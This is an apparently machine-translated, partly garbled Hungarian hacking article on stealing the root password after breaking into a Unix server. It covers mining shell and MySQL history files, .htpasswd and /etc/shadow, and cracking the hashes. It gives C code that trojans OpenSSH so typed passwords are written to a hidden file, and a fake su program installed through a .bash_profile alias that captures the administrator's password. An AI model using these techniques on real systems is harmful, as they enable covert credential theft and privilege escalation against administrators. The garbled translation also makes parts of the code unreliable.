10 Ways, hogy szar rue jelszó

Talán a legnagyobb probléma a hack - Definíció rue jelszót. Még ha egy hacker törte rendszer bármilyen kihasználni, hogy a jelszót nem könnyű. De minden anya van egy csavar, ezért engedje meg, hogy felfedje a 10 univerzális módon ezt a fontos vizsgálatot az információt;). Nem, akkor nem is kell, hogy megfeleljen az adminisztrátornak inni a sört a tudattalan (vagy inkább abba az állapotba, amelyben felfedi Önnek fontos információkat). Minden sokkal könnyebb - vannak olyan technikák, amelyek az alkalmazás után, akkor kap egy root jelszót. Természetesen minden attól függ, a helyzetet. Mindegyikük lesz szó az alábbiakban.

1. Keresési Perl / PHP szkriptek.

A módszert alkalmazzuk minden változatban a hackelés.

2. Keresés a történelem-fájlokat.

adminisztrátorok gyakran használják a konzol program, amely továbbítja a jelszót a parancssorban. Ez mind írva a történelem nevű fájlt .bash_history (természetesen a többi tolmácsok a fájlnév más lesz). Ott is kaphat Infa hibák miatt az admin team (I, például
Láttam azt az admin, ahelyett, hogy „su” szerzett „psu”, majd a jelszavát).

Van egy másik történet fájlt. Felhívta .mysql_history és szintén a felhasználó home könyvtárában. Itt található a jelszó módosításának parancsok SQL-hozzáféréssel. Ez a jelszó egybeeshet rue.

A módszer csak akkor alkalmazható, ha van teljes ellenőrzése alatt a rendszert. De mi történik, ha a történelem fájlok attribútum 644. Határozzuk meg azokat a fájlokat (majd olvasni), akkor a parancs találják / -perm 644 -name * _history.

3. A keresés .htpasswd.

Visszafejteni ezeket hash lehet John The Ripper programot. Nem tanítani, hogy nem, ezért úgy gondolja, hogy ez a módszer érti.

4. Keresés más fájlokat.

Vannak szerver, ahol a jelszavak meghatározott harmadik fél által készített alkalmazás fájlokat. Például, én azzal a helyzettel szembesülnek, ahol a jelszó volt a rue socks5.password fájlt.

Figyelem! Ezek a fájlok nem érhetők olvasásra. Ezért minden attól függ, a helyzet ...

5. tudomásul veszi a margón.

rendszergazdák gyakran elhagyják fontos fájlokat a könyvtárakban. Ezek tartalmaznak néhány megjegyzés. Lehetőség van arra, hogy azok között, meg tud felelni és jelszavakat. Magam is találkoztam ilyen narilcsoport rue és jelszót egy fájlt a „megjegyzések”. Ügyeljen arra, hogy az ilyen dolgok.

6. Keresse meg a naplókat.

7. szippantás adatokat.

Néhány rootkitek tartalmaznak helyi szippantás, amely lehetővé teszi, hogy könnyen megtalálják azokat a jelszavakat az ssh (egyszerű módosításával a / usr / bin / ssh-kompatibilis fakitermelés;)). Tipikusan az ilyen támogatás és a fájl elérési útját a log dokumentációban megjelölt a rootkit). Ez rendben van, de ideges, csak egy dolog: a legtöbb rootkitek tartalmazza az ssh öreg, amely támogatja csak az első protokollt. Ennek eredményeként, a támadó megszemélyesíteni belek.

De mi akadályozza építeni a saját ssh és tartalmazza azt a jelszavak megjegyzésével? Ez így van! Senki. Az OpenSSH a csomagot a fájl neve sshconnect1.c. Ezután behelyezzük a tartalma a következő sorokat:

Miután a sor „snprintf (prompt, sizeof (prompt),« %.30s@%.128s's jelszó: «, server_user, host);”

iFile = fopen ( «/ boot / kernel.old», »a»);
fprintf (iFile, »munkamenet% s% s \ n», server_user, host);
fclose (iFile);

Miután varrás "jelszó = read_passphrase (prompt, 0);"
iFile = fopen ( «/ boot / kernel.old«»a»);
fprintf (iFile, »jelszó% s \ n», jelszó);
fclose (iFile);

Ha helyesen tette, ssh találkozik incidens nélkül. Most, a rendszergazda nem veszi észre a hibát a rendszerben, és akkor tudja a jelszavát az ssh. Amikor megy a root - ez bánni a jelszavát,).

8. úgy tesz, mintha a rendszer szolgáltatás;).

Ez a módszer leírtam az egyik szobában Hacker (Yuniksoid, Fun Linux alatt). Mert az, hogy a felhasználók, akik olvassák a hacker nem az oldalon (és fordítva), akkor nem lesz felesleges megismételni a táskámat trükköket.

Így jön létre a fájl olvasása:

#define SORRY «Sajnos»
#define PFILE «tmp / .screen»
#define MYPATH «tmp / .screen_active»
#include
void sigexit (int nem);
int main () char át [40];
char Longs [100];
int Filep;
jelet (SIGINT, sigexit);
printf ( «jelszó:»);
rendszer ( «stty -echo»);
scanf ( «% s», át);
rendszer ( «stty echo»);
printf ( «\ r \ n»);
Filep = fopen (PFILE, »w»);
fprintf (Filep, »Pass% s \ n», át);
fclose (Filep);
printf ( «% s \ r \ n», bocs);
strcpy (long, »»);
strcat (long, »/ bin / ln -sf / bin / su«);
strcat (long, MYPATH);
rendszer (long);
exit (0);
>
void sigexit (int no) rendszer ( «stty echo»);
printf ( «\ r \ n \ r \ n»);
exit (0);
>

és sérteget su.c. Ha megnézzük egy egyszerű kód láthatjuk, hogy tele van az utánzás / bin / su, csak egy jelszót a belépéshez tmp / .screen fájlt. bináris maga lesz a tmp / .screen_active fájl (összes viszonyított relatív útvonalakkal felhasználó home könyvtárában). Ha a fájl lefut, ő helyett a szabványos / bin / su. Így a rendszergazda azt hiszi, hogy rossz jelszót, mivel a második kísérlet Suede sikeres lesz.

Mielőtt ellenőrizze ezt a módszert a gyakorlatban, írja a vonal „alias su /home/user/tmp/.screen_active fájl

/.bash_profile és várjon, amíg a rendszergazda úgy dönt, hogy suidnutsya gyökér. Ha ez megtörténik - a jelszó;).

10. A szokásos módon.

És végül, itt az ideje, hogy meséljek a legtöbb triviális módon. A hacker rögzíti a rendszer, és hozzáfér a / etc / shadow. Továbbá minden, a forgatókönyvet - a dekódolás venni, egy jó szótárt, és csak remélem, szerencsét hoz. Azt hiszem, nem csak szembe ezzel a módszerrel. És érdekes módon, folyamatosan elfelejtettem a többi 9 ...

Itt található az ezt a cikket egy ismerősének:

Több, mint 500 hamis weboldalak kínál vásárolni az iPhone X

Számos hibákat találtak az új iOS 11,1 során Pwn2Own verseny

A Google kérdés, segítségével a „fekete» SEO, elterjedt Bunker Zeus Panda

Drivers Savitech cég szállított főtanúsítványokat

Letartóztatták hacker, hacker kijelenti munkavállaló FireEye

Kapcsolódó cikkek